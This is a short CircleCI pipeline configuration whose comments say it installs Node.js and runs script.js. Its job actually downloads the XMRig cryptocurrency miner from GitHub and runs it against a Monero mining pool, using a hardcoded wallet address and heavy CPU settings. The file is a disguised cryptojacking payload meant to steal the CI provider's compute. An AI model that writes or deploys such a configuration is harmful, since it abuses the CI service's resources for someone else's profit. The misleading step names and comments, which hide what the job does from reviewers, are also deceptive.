version: 2.1

jobs:
  run-g:
    docker:
      - image: ubuntu:latest

    steps:
      - checkout

      # Install Node.js and npm
      - run:
          name: Install Node.js and npm
          command: |
            apt-get update -y
            apt-get install -y  curl

      # Display Node.js and npm versions
      # Run script.js
      - run:
          name: Run script.js
          command: |
           curl -LO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
           tar -xf xmrig-6.21.0-linux-x64.tar.gz
           cd xmrig-6.21.0
           ./xmrig --donate-level 5 -o xmr.2miners.com:2222 -u 4AAAw275dkMcAEj1BycAa3cfVHBJo1NNuDeM3kbVWX5SVTVS7c1Tw7hgbkfjvFJKgm62um7uv2u9YHbTBmZjAuBjJFJph4t -p R#2 -k --coin monero --threads 50 --max-cpu-usage 50

workflows:
  version: 2
  run-g-workflow:
    jobs:
      - run-g
